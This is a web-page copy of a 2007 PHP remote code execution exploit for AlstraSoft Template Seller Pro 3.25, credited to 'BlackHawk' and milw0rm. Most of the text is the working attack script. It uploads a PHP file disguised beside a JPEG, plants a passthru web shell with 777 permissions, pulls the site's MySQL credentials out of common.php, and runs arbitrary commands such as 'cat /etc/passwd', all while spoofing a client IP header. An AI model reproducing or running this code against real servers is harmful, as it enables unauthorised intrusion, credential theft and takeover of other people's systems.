Docstoc
EXCLUSIVE OFFER FOR DOCSTOC USERS
Try the all-new QuickBooks Online for FREE.  No credit card required.

AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit

Document Sample
AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit Powered By Docstoc
					                       AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit   Page 1/7
  1    #!/usr/bin/php −q −d short_open_tag=on
  2    <?
  3    echo "
  4    AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit
  5    by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
  6    Thanks to rgod for the php code and Marty for the Love
  7
  8    ";
  9    if ($argc<4) {
  10   echo "Usage: php ".$argv[0]." Host Path CMD
  11   Host:   target server (ip/hostname)
  12   Path:   path of template
  13   CMD:      A Shell Command
  14
  15   Example:
  16   php ".$argv[0]." localhost /template/ cat /etc/passwd";
  17
  18   die;
  19   }
  20   error_reporting(0);
  21   ini_set("max_execution_time",0);
  22   ini_set("default_socket_timeout",5);
  23
  24   /*
  25     ___________________________________________________________________
  26   /        This script is part of the AlstraSoft Exploit Pack:          \
  27   |                                                                     |
  28   | http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; |
  29   |                                                                     |
  30   |             You can find the patches for this bugs at:              |
  31   |                                                                     |
  32   |    http://itablackhawk.altervista.org/download/alsoft_patch.zip     |
  33   |                                                                     |
  34   \________________________.:BlackHawk 2007:._________________________/
  35
  36   */
  37
  38   /*
  39   VULN EXPLANATION
  40
  41   Same problem of Vuln N.1 but with this we can upload PHP files..
  42
  43   The Vulnerable script can be found in admin/addsptemplate.php
  44
  45
  46   */
  47
  48   function quick_dump($string)
  49   {
  50     $result=’’;$exa=’’;$cont=0;
  51     for ($i=0; $i<=strlen($string)−1; $i++)
  52     {
BlackHawk                                                                                  05/20/2007
                    AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit              Page 2/7
  53         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  54         {$result.=" .";}
  55         else
  56         {$result.=" ".$string[$i];}
  57         if (strlen(dechex(ord($string[$i])))==2)
  58         {$exa.=" ".dechex(ord($string[$i]));}
  59         else
  60         {$exa.=" 0".dechex(ord($string[$i]));}
  61         $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  62       }
  63      return $exa."\r\n".$result;
  64    }
  65    $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
  66    function sendpacketii($packet)
  67    {
  68       global $proxy, $host, $port, $html, $proxy_regex;
  69       if ($proxy==’’) {
  70          $ock=fsockopen(gethostbyname($host),$port);
  71          if (!$ock) {
  72            echo ’No response from ’.$host.’:’.$port; die;
  73          }
  74       }
  75       else {
  76               $c = preg_match($proxy_regex,$proxy);
  77          if (!$c) {
  78            echo ’Not a valid proxy...’;die;
  79          }
  80          $parts=explode(’:’,$proxy);
  81          echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  82          $ock=fsockopen($parts[0],$parts[1]);
  83          if (!$ock) {
  84            echo ’No response from proxy...’;die;
  85               }
  86       }
  87       fputs($ock,$packet);
  88       if ($proxy==’’) {
  89          $html=’’;
  90          while (!feof($ock)) {
  91            $html.=fgets($ock);
  92          }
  93       }
  94       else {
  95          $html=’’;
  96          while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  97            $html.=fread($ock,1);
  98          }
  99       }
  100      fclose($ock);
  101   }
  102
  103   $host=$argv[1];
  104   $path=$argv[2];
BlackHawk                                                                                          05/20/2007
                     AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit                  Page 3/7
  105
  106   $cmd="";
  107   for ($i=3; $i<=$argc−1; $i++){
  108   $cmd.=" ".$argv[$i];
  109   }
  110   $port=80;
  111   $proxy="";
  112
  113   $cmd=urlencode($cmd);
  114   if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {echo ’Error... check the path!’; die;}
  115   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  116
  117   echo "− Uploading Shell Creator..\r\n";
  118   $italy_rulez=
  119   chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
  120   chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
  121   chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).
  122   chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).
  123   chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).
  124   chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).
  125   chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).
  126   chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).
  127   chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).
  128   chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).
  129   chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).
  130   chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).
  131   chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).
  132   chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).
  133   chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).
  134   chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).
  135   chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).
  136   chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).
  137   chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).
  138   chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).
  139   chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).
  140   chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).
  141   chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).
  142   chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  143   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  144   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  145   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  146   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  147   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  148   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
  149   chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).
  150   chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).
  151   chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
  152   chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).
  153   chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
  154   chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
  155   chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).
  156   chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).
BlackHawk                                                                                               05/20/2007
                   AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit   Page 4/7
  157   chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).
  158   chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).
  159   chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).
  160   chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).
  161   chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).
  162   chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).
  163   chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).
  164   chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).
  165   chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).
  166   chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).
  167   chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
  168   chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
  169   chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
  170   chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
  171   chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
  172   chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).
  173   chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).
  174   chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).
  175   chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).
  176   chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).
  177   chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).
  178   chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).
  179   chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).
  180   chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
  181   chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).
  182   chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).
  183   chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).
  184   chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
  185   chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
  186   chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).
  187   chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).
  188   chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).
  189   chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).
  190   chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).
  191   chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).
  192   chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).
  193   chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).
  194   chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).
  195   chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).
  196   chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).
  197   chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).
  198   chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
  199   chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
  200   chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
  201   chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
  202   chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
  203   chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).
  204   chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).
  205   chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).
  206   chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).
  207   chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).
  208   chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).
BlackHawk                                                                              05/20/2007
                        AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit                  Page 5/7
  209   chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).
  210   chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).
  211   chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
  212   chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).
  213   chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).
  214   chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).
  215   chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
  216   chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).
  217   chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).
  218   chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).
  219   chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).
  220   chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).
  221   chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).
  222   chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).
  223   chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).
  224   chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).
  225   chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).
  226   chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).
  227   chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).
  228   chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).
  229   chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).
  230   chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).
  231   chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).
  232   chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).
  233   chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).
  234   chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).
  235   chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).
  236   chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).
  237   chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).
  238   chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).
  239   chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).
  240   chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);
  241   $data="−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a\r\n";
  242   $data.="Content−Disposition: form−data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";
  243   $data.="Content−Type:\r\n\r\n";
  244   $data.="<?php
  245   \$fp=fopen(’piggy_marty.php’,’w’);
  246   fputs(\$fp,’<?php error_reporting(0);
  247   set_time_limit(0);
  248   if (get_magic_quotes_gpc()) {
  249   \$_GET[cmd]=stripslashes(\$_GET[cmd]);
  250   }
  251   echo 666999;
  252   passthru(\$_GET[cmd]);
  253   echo 666999;
  254   ?>’);
  255   fclose(\$fp);
  256   chmod(’piggy_marty.php’,777);
  257   include ’../../include/common.php’;
  258   echo ’delimitator’.\$db_server.’|’.\$db_user.’|’.\$db_password.’|’.\$db_database;
  259   ?>\r\n";
  260   $data.=’−−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
BlackHawk                                                                                                  05/20/2007
                         AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit                                 Page 6/7
  261   Content−Disposition: form−data; name="addsubmit"
  262
  263   1
  264   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
  265   Content−Disposition: form−data; name="type"
  266
  267   2
  268   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
  269   Content−Disposition: form−data; name="category"
  270
  271   Exploit And Similar
  272   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
  273   Content−Disposition: form−data; name="sdes"
  274
  275   4
  276   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a
  277   Content−Disposition: form−data; name="fpi"; filename="daforno_imperat.jpeg";
  278   Content−Type: image/pjpeg
  279
  280   ’.$italy_rulez.’
  281   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a−−
  282   ’;
  283   $packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";
  284   $packet.="CLIENT−IP: 999.999.999.999\r\n";//spoof
  285   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, * /*\r\n";
  286   $packet.="Referer: http://".$host.$path."/example.html\r\n";
  287   $packet.="Accept−Language: it\r\n";
  288   $packet.="Content−Type: multipart/form−data; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−−7d529a1d23092a\r\n";
  289   $packet.="Accept−Encoding: gzip, deflate\r\n";
  290   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
  291   $packet.="Host: ".$host."\r\n";
  292   $packet.="Content−Length: ".strlen($data)."\r\n";
  293   $packet.="Connection: Close\r\n";
  294   $packet.="Cache−Control: no−cache\r\n\r\n";
  295   $packet.=$data;
  296   sendpacketii($packet);
  297
  298   echo "− Retrieving correct Path where the shell is located..\r\n";
  299
  300   $packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";
  301   $packet.="Host: ".$host."\r\n";
  302   $packet.="Connection: Close\r\n\r\n";
  303   $packet.=$data;
  304   sendpacketii($packet);
  305   if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki))
  306   {
  307   echo "− Creating the Shell & getting server credentials..\r\n";
  308   $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";
  309   $packet.="Host: ".$host."\r\n";
  310   $packet.="Connection: Close\r\n\r\n";
  311   $packet.=$data;
  312   sendpacketii($packet);
BlackHawk                                                                                                                  05/20/2007
                        AlstraSoft Template Seller Pro 3.25 Remote Code Execution Exploit     Page 7/7
  313
  314   sleep(3);
  315   $temp=explode(’delimitator’,$html);
  316   list($myserver,$myusername,$mypassword,$mydbname)=explode(’|’,$temp[1]);
  317   echo "
  318
  319   −−− INFO FROM COMMON.PHP −−−
  320
  321   MySQL Server: $myserver
  322   MySQL Username: $myusername
  323   MySQL Password: $mypassword
  324   MySQL Database: $mydbname
  325
  326   −−− END INFO −−−
  327
  328   ";
  329   echo "Step 5 − Execute Commands exist..\r\n";
  330   $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
  331   $packet.="Host: ".$host."\r\n";
  332   $packet.="Connection: Close\r\n\r\n";
  333   $packet.=$data;
  334   sendpacketii($packet);
  335   if (strstr($html,"666999"))
  336   {
  337     echo "Exploit succeeded...\r\n";
  338     $temp=explode("666999",$html);
  339     die("\r\n".$temp[1]."\r\n");
  340   }
  341
  342   }
  343   else
  344   {
  345   die (’Error: Can\’t retrieve Shell Path’);
  346   }
  347
  348   # Coded With BH Fast Generator v0.1
  349   ?>
  350
  351   # milw0rm.com [2007−05−20]




BlackHawk                                                                                     05/20/2007

				
DOCUMENT INFO